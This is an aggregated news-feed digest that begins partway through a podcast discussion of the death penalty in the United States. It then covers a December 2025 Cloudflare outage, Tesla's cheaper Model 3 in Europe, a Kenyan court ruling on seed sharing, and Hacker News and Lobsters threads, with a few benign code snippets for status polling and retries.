But Oklahoma became infamous on the world stage about 10 years ago, a little more, for botching a series of executions. I’ve been covering the case of Richard Glossip for a while. Richard Glossip is a man with a long-standing innocence claim whose conviction and death sentence were overturned only this year. Richard Glossip was almost put to death by the state of Oklahoma in 2015, and I was outside the prison that day. And it’s only because they had the wrong drug on hand that it did not go through.

And so going into a situation where I was preparing to witness an execution in Oklahoma, I was all too keenly aware of the possibility that something could go wrong — and that’s just something you know when you’re covering this stuff. And instead, Oklahoma carried out the three-drug protocol execution of a man named Anthony Sanchez in September of 2023. I had written about Anthony’s case. I had spoken to him the day before and for the better part of a year. And I think I’m still trying to understand what I saw that day because, by all appearances, things looked like they went as smoothly as one would hope, right?

He was covered with a sheet. You saw the color in his face change. He went still. And as a journalist or just an ordinary person trying to describe what that meant, what I was seeing — I couldn’t really tell you, because the process by design was made to look that way, but I could not possibly guess as to what he was experiencing.

Again, that’s because lethal injection and that three-drug protocol has been designed to make it look humane and make it look like everything’s gone smoothly.

I will say one thing that has really stuck with me about that execution was that I was sitting right behind the attorney general of Oklahoma, Gentner Drummond, who has attended — I think to his credit, frankly — every execution that has been carried out in Oklahoma under his tenure. He was sitting in front of me, and the one witness who was there, who, I believe, was a member of Anthony’s family, was sitting one seat over. After the execution was over, she was quietly weeping, and Gentner Drummond, the attorney general who was responsible for this execution, put his hand on her and said, “I’m sorry for your loss.” And it was this really bizarre moment because he was acknowledging that this was a loss, that this death of this person that she clearly cared about — he was responsible for it.

And I don’t know that he has ever said something like that since, because a lot of us journalists in the room reported back. And it’s almost like, you’re not supposed to say that — there shouldn’t be sorrow here, really. This is justice. This is what’s being done in our name. And I’m still trying to figure out how I feel about that. Because by and large in the executions I’ve reported on, you don’t have the attorney general himself or the prosecutor who sent this person to death row attending the execution. It’s out of sight, out of mind.

AL: Malcolm, as we’ve talked about and has been repeatedly documented, the way that the death penalty has been applied has been racist and classist, disproportionately affecting Black and Latino people and poor people. It has also historically penalized people who have mental health issues or intellectual disabilities . Even with all that evidence, why does this persist? How has vengeance become such a core part of the American justice system?

MG: As I said before, I think what’s happened is that the people who are opposed to the death penalty are having a different conversation than the people who are in favor of it.

The people who are in favor are trying to make a kind of moral statement about society’s ultimate intolerance of people who violate certain kinds of norms, and they are in the pursuit of that kind of moral statement, willing to go to almost any lengths. And on the other side are people who are saying that going this far is outside of the moral boundaries of a civilized state.

Those are two very different claims that proceed on very different assumptions. And we’re talking past each other. It doesn’t matter to those who are making a broad moral statement about society’s intolerance what the condition, status, background, or makeup of the convicted criminal is — because they’re not basing their decision on the humanity of the criminal defendant. They’re making a broad moral point.

“I’ve often wondered whether in doing series, as I did, that focus so heavily on the details of an execution, I’m contributing to the problem.”

I’ve often wondered whether in doing series, as I did, that focus so heavily on the details of an execution, I’m contributing to the problem. That if opponents make it all about the individual circumstances of the defendant, the details of the case, was the person guilty or not, was the kind of punishment cruel and unusual — we’re kind of buying into the moral error here.

Because we’re opening the possibility that if all we were doing was executing people who were 100% guilty and if our method of execution was proven without a shadow of a doubt to be “humane,” then we don’t have a case anymore.

AL: Right, then it’d be fine.

MG: So I look at what I’ve done — that’s my one reservation about spending all this time on the Kenny Smith case, is that we shouldn’t have to do this. It should be enough to say that even the worst person in the world does not deserve to be murdered by a state.

That’s not what states do, right, in a civilized society. That one sentence ought to be enough. And it’s a symptom of how distorted this argument has become — that it’s not enough.

AL: Liliana, I want to briefly get your thoughts on this too.

LS: I think that people who are opposed to the death penalty, and abolitionists, oftentimes say, “This is a broken system.” And we talk about prisons in that way: “this is a broken system.”

I think it’s a mistake to say that this is a broken system because I don’t think that this system, at its best, as you’ve just discussed, would be fine if it only worked correctly. I think that that’s absolutely not the case. So I do agree that, this system — I don’t hide the fact that I’m very opposed to the death penalty. I don’t think that you can design it and improve it and make it fair and make it just.

“I don’t think that you can design it and improve it and make it fair and make it just.”

I also think that part of the reason that people have a hard time saying that is: if you were to say that about the death penalty in this country, for all of the reasons that may be true, then you would be forced to deal with the criminal justice system more broadly, and with prisons and sentencing as a whole. And I think that there’s a real reluctance to see the problems that we see in death penalty cases in that broader context, because what does that mean for this country, if you’re calling into question mass incarceration and the purpose that these sentences serve?

AL: We’ve covered a lot here. I want to thank you both for joining me on the Intercept Briefing.

MG: Thank you so much.

LS: Thank you.

Another Cloudflare outage takes down websites including LinkedIn and Zoom

Guardian
www.theguardian.com
2025-12-05 10:58:47
Web infrastructure provider says it has implemented a fix after users had seen ‘a large number of empty pages’ A host of websites including LinkedIn, Zoom and Downdetector went offline on Friday morning after fresh problems at Cloudflare. Cloudflare said shortly after 9am UK time that it was “invest...
Original Article

A host of websites including LinkedIn, Zoom and Downdetector went offline on Friday morning after fresh problems at Cloudflare.

Cloudflare said shortly after 9am UK time that it was “investigating issues with Cloudflare Dashboard and related APIs”, referring to application programming interfaces.

The internet infrastructure provider said users had seen “a large number of empty pages” as a result. It added shortly after that it had implemented a potential fix and was monitoring the results.
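
For anyone wanting to monitor an incident like this programmatically: status pages hosted on Atlassian Statuspage conventionally expose a JSON summary endpoint, and Cloudflare’s status page appears to follow that convention. A minimal sketch; the URL and response shape are assumptions based on that convention, not taken from the article.

```python
# Poll a Statuspage-style status endpoint. The URL below is an assumption
# based on the common /api/v2/status.json convention, not from the article.

import json
import urllib.request

STATUS_URL = "https://www.cloudflarestatus.com/api/v2/status.json"

with urllib.request.urlopen(STATUS_URL, timeout=10) as resp:
    payload = json.load(resp)

# Typical Statuspage shape: {"status": {"indicator": "...", "description": "..."}}
status = payload["status"]
print(f'{status["indicator"]}: {status["description"]}')
```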

A number of websites and platforms were down, including the Downdetector site used to monitor online service issues. Users reported problems with other websites including Zoom, LinkedIn, Shopify and Canva, although many are back online.

The Downdetector website recorded more than 4,500 reports related to Cloudflare after it came back online.

The India-based stockbroker Groww said it was facing technical issues “due to a global outage at Cloudflare”. Its services have since been restored.

Cloudflare provides network and security services for many online businesses to help their websites and applications operate. It claims that about 20% of all websites use some form of its services.

It comes only three weeks after previous problems at Cloudflare hit the likes of X, ChatGPT, Spotify, and multiplayer games such as League of Legends.

Jake Moore, a global cybersecurity adviser at ESET, said: “If a major provider like Cloudflare goes down for any reason, thousands of websites instantly become unreachable. The problems often lie with the fact we are using an old network to direct internet users around the world to websites, but it simply highlights there is one huge single point of failure in this legacy design.”

Tesla cuts Model 3 price in Europe as sales slide amid Musk backlash

Guardian
www.theguardian.com
2025-12-05 10:55:10
CEO Elon Musk says lower-cost electric car will reignite demand by appealing to broader range of buyers Tesla has launched the lower-priced version of its Model 3 car in Europe in a push to revive sales after a backlash against Elon Musk’s work with Donald Trump and weakening demand for electric veh...
Original Article

Tesla has launched the lower-priced version of its Model 3 car in Europe in a push to revive sales after a backlash against Elon Musk’s work with Donald Trump and weakening demand for electric vehicles.

Musk, the electric car maker’s chief executive, has argued that the cheaper option, launched in the US in October, will reinvigorate demand by appealing to a wider range of buyers.

The new Model 3 Standard is listed at €37,970 (£33,166) in Germany, 330,056 Norwegian kroner (£24,473) and 449,990 Swedish kronor (£35,859). The move follows the launch of a lower-priced Model Y SUV, Tesla’s bestselling model, in Europe and the US.

Tesla sales have slumped across Europe as the company faces increasingly tough competition from its Chinese rival BYD, which outsold the US electric vehicle maker across the region for the first time in spring.

Sales across the EU have also been hurt by a buyer backlash against Musk’s support for Trump’s election campaign and period working in the president’s administration.

In his role running the “department of government efficiency”, or Doge, the tech billionaire led sweeping job cuts, but quit in May after falling out with Trump over the “big, beautiful” tax and spending bill.

Musk has also alienated customers through other controversial political interventions, including appearing to give a Nazi salute at Trump’s victory rally, showing support for Germany’s far-right AfD party, and accusing Keir Starmer and other senior UK politicians of covering up the scandal about grooming gangs.

New taxes on electric cars in last month’s budget could undermine UK demand, critics have said. UK electric car sales grew at their slowest rate in two years in November, at just 3.6%, according to figures from the Society of Motor Manufacturers and Traders (SMMT).

“[This] should be seen as a wake-up call that a sustained increase in demand for EVs cannot be taken for granted,” said Mike Hawes, the chief executive of the SMMT. “We should be taking every opportunity to encourage drivers to make the switch, not punishing them for doing so.”

The chancellor’s new pay-per-mile road tax on EVs will charge drivers 3p for every mile from April 2028, costing motorists about £250 a year on average.
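
The arithmetic behind that average is simple: at 3p a mile, £250 a year corresponds to roughly 8,300 miles of driving. A quick sketch using only the figures quoted above:

```python
# Implied annual mileage behind the "about £250 a year" estimate,
# using only the 3p-per-mile rate quoted above.

rate_per_mile = 0.03       # £ per mile, from April 2028
average_annual_cost = 250  # £ per year, as reported

implied_miles = average_annual_cost / rate_per_mile
print(f"Implied average annual mileage: {implied_miles:,.0f} miles")  # 8,333
```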

What are you doing this weekend?

Lobsters
lobste.rs
2025-12-05 10:54:28
Feel free to tell what you plan on doing this weekend and even ask for help or feedback. Please keep in mind it’s more than OK to do nothing at all too!...
Original Article

Feel free to tell what you plan on doing this weekend and even ask for help or feedback.

Please keep in mind it’s more than OK to do nothing at all too!

The US polluters that are rewriting the EU's human rights and climate law

Hacker News
www.somo.nl
2025-12-05 09:58:01
Comments...

Cloudflare down, websites offline with 500 Internal Server Error

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 09:12:15
Cloudflare is down, as websites are crashing with a 500 Internal Server Error. Cloudflare is investigating the reports. [...]...
Original Article

Cloudflare is down, as websites are crashing with a 500 Internal Server Error. Cloudflare has confirmed that it's investigating the reports.

Cloudflare, a service that many websites use to stay fast and secure, is currently facing problems.

Because of this, people visiting some websites are seeing a “500 Internal Server Error” message instead of the normal page.

Cloudflare outage takes down DownDetector

A 500 error usually means something went wrong on the server side, not on the user’s device or internet connection.
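
Since the fault is server-side, the standard client-side pattern is to retry with exponential backoff rather than change the request. A minimal, generic sketch (not Cloudflare-specific; the example URL is a placeholder):

```python
# Generic retry-with-backoff pattern for 5xx responses. Illustrative only.

import time
import requests  # third-party: pip install requests

def fetch_with_retries(url: str, attempts: int = 4, base_delay: float = 1.0):
    resp = None
    for attempt in range(attempts):
        resp = requests.get(url, timeout=10)
        if resp.status_code < 500:
            return resp  # success, or a 4xx the client must fix itself
        # 5xx means the server failed; wait and try again
        time.sleep(base_delay * (2 ** attempt))
    resp.raise_for_status()  # surface the final 5xx after giving up

# Usage (placeholder URL):
# page = fetch_with_retries("https://example.com/")
```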

In an update to its status page, Cloudflare says it's investigating issues with Cloudflare Dashboard and related APIs.

"Customers using the Dashboard / Cloudflare APIs are impacted as requests might fail and/or errors may be displayed," the company noted.

Cloudflare says it has implemented a fix, and websites should start coming back online soon.

This is a developing story....


Kenyan court declares law banning seed sharing unconstitutional

Hacker News
apnews.com
2025-12-05 09:09:25
Comments...
Original Article

KISUMU, Kenya (AP) — A high court in Kenya on Thursday declared unconstitutional sections of a seed law that prevented farmers from sharing and selling indigenous seeds in what food campaigners have called a landmark win for food security.

Farmers in Kenya could face up to two years’ imprisonment and a fine of 1 million Kenyan shillings ($7,700) for sharing seeds through their community seed banks, according to a seed law signed in 2012.

Justice Rhoda Rutto on Thursday said sections of the seed law that gave government officials powers to raid seed banks and seize seeds were also unconstitutional.

The law was introduced to curb the growing sale of counterfeit seeds, which were causing losses in the agricultural sector, and it gave sole seed trading rights to licensed companies.

The case had been filed by 15 smallholder farmers, who are members of community seed banks that have been in operation for years, preserving and sharing seeds among colleagues.

A farmer, Samuel Wathome, who was among the 15, said the old farming practices had been vindicated.

“My grandmother saved seeds, and today the court has said I can do the same for my grandchildren without fear of the police or of prison,” he said.

Elizabeth Atieno, a food campaigner at Greenpeace Africa, called the win a “victory for our culture, our resilience, and our future.”

“By validating indigenous seeds, the court has struck a blow against the corporate capture of our food system. We can finally say that in Kenya, feeding your community with climate-resilient, locally adapted seeds is no longer a crime,” she said.

Food campaigners have in the past encouraged governments to work with farmers to preserve indigenous seeds as a way of ensuring food security by offering farmers more plant varieties.

Indigenous seeds are believed to be drought resistant and adaptable to the climate conditions of their native areas, and hence often outperform hybrid seeds.

Kenya has a national seed bank based near the capital Nairobi where indigenous seeds are stored in cold rooms, but farmers say community seed banks are equally important for variety and proximity to the farmer.

The country has faced challenges in the seed sector where counterfeit seeds were sold to farmers, leading to losses amounting to millions of shillings in a country that relies on rain-fed agriculture.

Cloudflare Is Down

Hacker News
cloudflare.com
2025-12-05 08:59:00
Comments...
Original Article

Our connectivity cloud is the best place to
  • connect your users, apps, clouds, and networks
  • protect everything you connect to the Internet
  • build and scale applications

Over 60 cloud services on one unified platform, uniquely powered by a global cloud network. We call it the connectivity cloud.

Connect your people, apps and AI agents

Modernize your network and secure your workspace against unauthorized access, web browsing attacks and phishing. Accelerate your journey to Zero Trust with our SASE platform today.


Protect and accelerate websites and AI-enabled apps

Use our industry-leading WAF, DDoS, and bot protection to protect your websites, apps, APIs, and AI workloads while accelerating performance with our ultra-fast CDN. Get started in 5 minutes.


Build and secure AI agents

Agents are the future of AI, and Cloudflare is the best place to get started. Use our agents framework and orchestration tools to run the models you choose and deliver new agents quickly. Build, deploy, and secure access for remote MCP servers so agents can access the features of your apps.


One global cloud network unlike any other

Only Cloudflare offers an intelligent, global cloud network built from the ground up for security, speed, and reliability.

  • 60+ cloud services available globally
  • 234B cyber threats blocked each day
  • 20% of all websites protected by Cloudflare
  • 330+ cities in 125+ countries, including mainland China

Leading companies rely on Cloudflare

How Cloudflare can help

  • Accelerate website performance
  • Block bot traffic: stop bot attacks in real time by harnessing data from millions of websites protected by Cloudflare
  • Optimize video experiences
  • Deploy serverless code: build serverless applications and deploy instantly across the globe for speed, reliability, and scale
  • Deploy AI on the edge
  • Eliminate egress fees for object storage


Get started with the connectivity cloud
  • Get started for free: easy, instant access to Cloudflare security and performance services.
  • Need help choosing? Get a personalized product recommendation for your specific needs.
  • Talk to an expert: have questions or want to get a demo? Get in touch with one of our experts.

Is Cloudflare Down Again? Also, DownDetector/Claude.ai/LinkedIn?

Hacker News
news.ycombinator.com
2025-12-05 08:55:47
Comments...
Original Article
Is Cloudflare Down Again? Also, DownDetector/Claude.ai/LinkedIn?
18 points by dfasoro 30 minutes ago | 4 comments

I was writing a blogpost on Medium and I noticed errors, tried to open LinkedIn? down. tried downdetector? down. Claude.ai is also down



I'm getting a lot of errors on a lot of pages from cf.



Yep, just went back up and then down again. Let's not put all eggs in one basket...


Cloudflare RIP

Cloudflare Down Again – and DownDetector Is Also Down

Hacker News
news.ycombinator.com
2025-12-05 08:51:42
Comments...
Original Article

https://downdetectorsdowndetectorsdowndetectorsdowndetector.... reports that https://downdetectorsdowndetectorsdowndetector.com/ is down, guessing downdetectorsdowndetectorsdowndetector runs via cloudflare!



This is art



You know what, maybe AI is taking all the goddamn jobs


They pretty much said this. All the big companies that had recent outages are companies that publicly embraced vibe coding.



Time to use some local ai with Docker Model Runner :)

No cloudflare no problem

https://github.com/docker/model-runner
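For illustration, a minimal sketch of that suggestion: Docker Model Runner exposes an OpenAI-compatible API, so a local model can be queried in place of a cloud-hosted one. The port, endpoint path, and model name below are assumptions that depend on the local setup, not guaranteed defaults.

    # Query a locally served model instead of a cloud-hosted one. Assumes a
    # model has been pulled (e.g. `docker model pull ai/smollm2`) and host
    # TCP access is enabled; port, path, and model are setup-dependent.
    import requests

    resp = requests.post(
        "http://localhost:12434/engines/v1/chat/completions",
        json={
            "model": "ai/smollm2",
            "messages": [{"role": "user", "content": "Is Cloudflare down?"}],
        },
        timeout=60,
    )
    resp.raise_for_status()
    print(resp.json()["choices"][0]["message"]["content"])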


I assume this is why Claude stopped working


There are other LLMs you can ask to be absolutely, 100% sure.


downdetectors downdetector shows that downdetector should not be down. Something is wrong here.

https://downdetectorsdowndetector.com/



Crunchyroll down too got me and the anime community stressed


LinkedIn down


i can confirm it down again



jesus fucking christ i just wanna play runescape


This made getting paged at 4am worth it

Cloudflare is down

Hacker News
www.cloudflare.com
2025-12-05 08:50:16
Comments...